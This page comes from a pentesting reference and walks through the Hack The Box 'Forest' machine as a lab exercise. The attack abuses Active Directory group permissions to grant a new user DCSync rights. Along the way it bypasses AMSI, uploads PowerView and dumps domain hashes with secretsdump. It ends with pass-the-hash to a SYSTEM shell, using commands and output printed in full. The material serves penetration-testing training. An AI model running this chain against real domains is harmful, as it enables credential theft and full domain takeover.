Pentesting Quick Reference OSCP and Beyond

DCSync Example Forest HTB

Last updated 3 months ago

DCSync Example Forest HTB

Exploiting DCSync (from Forest(HTB))

From the above figure, we can see that svc-alfresco is a member of the group Service Accounts which is a member of the group Privileged IT Accounts, which is a member of Account Operators. which we can see by checking the "shortest path to domain admins" and then cheking the node properties.

Moreover, the Account Operators group has GenericAll permissions on the Exchange Windows Permissions group, which has WriteDacl permissions on the domain.

This was a mouthful, so let’s break it down.

svc-alfresco is not just a member of Service Accounts, but is also a member of the groups Privileged IT Accounts and Account Operators.
The Account Operators group has GenericAll permission on the Exchange Windows Permissions group. This permission essentially gives members full control of the group and therefore allows members to directly modify group membership. Since svc-alfresco is a member of Account Operators, he is able to modify the permissions of the Exchange Windows Permissions group.
The Exchange Windows Permission group has WriteDacl permission on the domain HTB.LOCAL. This permission allows members to modify the DACL (Discretionary Access Control List) on the domain. We’ll abuse this to grant ourselves DcSync privileges, which will give us the right to perform domain replication and dump all the password hashes from the domain.

Putting all the pieces together, the following is our attack path.

Create a user on the domain. This is possible because svc-alfresco is a member of the group Account Operators.
Add the user to the Exchange Windows Permission group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group.
Give the user DcSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.
Perform a DcSync attack and dump the password hashes of all the users on the domain.
Perform a Pass the Hash attack to get access to the administrator’s account.

Now add a new user and add it to the exchange group

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user ammar ammar123 /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user ammar
User name                    ammar
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/30/2023 1:26:16 AM
Password expires             Never
Password changeable          7/31/2023 1:26:16 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" /add ammar
The command completed successfully.

Alternate syntax
 Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Members "ammar"

Now to check the aval modules you can use the command

menu

Now run the following commands before executing anything on target.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> menu


   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers

[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> powershell -ep bypass
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Desktop>
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Bypass-4MSI

Abusing write dacl

First, we need to create a credential object

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $username ="htb\ammar"
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $password = ConvertTo-SecureString "ammar123" -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $credential = New-Object System.Management.Automation.PSCredential($username, $password)

Now, need PowerView, so locate it and upload it.

┌──(kali㉿kali)-[~/Desktop]
└─$ locate PowerView 
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1
                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
                                        
Info: Uploading /home/kali/Desktop/PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!

Now import PowerView

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> menu


   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers

[+] Add-DomainGroupMember 
[+] Add-DomainObjectAcl 
[+] Add-RemoteConnection 
[+] Add-Win32Type 
[+] Convert-ADName 
[+] Convert-DNSRecord 
[+] ConvertFrom-LDAPLogonHours 
[+] ConvertFrom-SID 
[+] ConvertFrom-UACValue 
[+] Convert-LDAPProperty

Now execute one of the following to grant dcsync rights.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-DomainObjectAcl -Credential $credential -PrincipalIdentity 'htb\ammar' -TargetIdentity 'htb.local\Domain Admins' -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-ObjectAcl -PrincipalIdentity 'htb\ammar' -Credential $credential -Rights DCSync

You can also use the following syntax

Add-DomainObjectAcl -Credential $credial -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity ammar -Rights DCSync

Dumping hashes

Now, we can use impacket to dump all hashes.

┌──(kali㉿kali)-[~/Desktop/new]
└─$ impacket-secretsdump htb.local/ammar:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Pass the Hash

Now, we can simply pass the hash to get shell.

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 [email protected] 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file zcJDWnNu.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service GPAd on 10.10.10.161.....
[*] Starting service GPAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Pass the hash with evil-winrm

You can also use evil-winrm. Remember to use only NT hash(last part).

PreviousDCSync NextBloodHound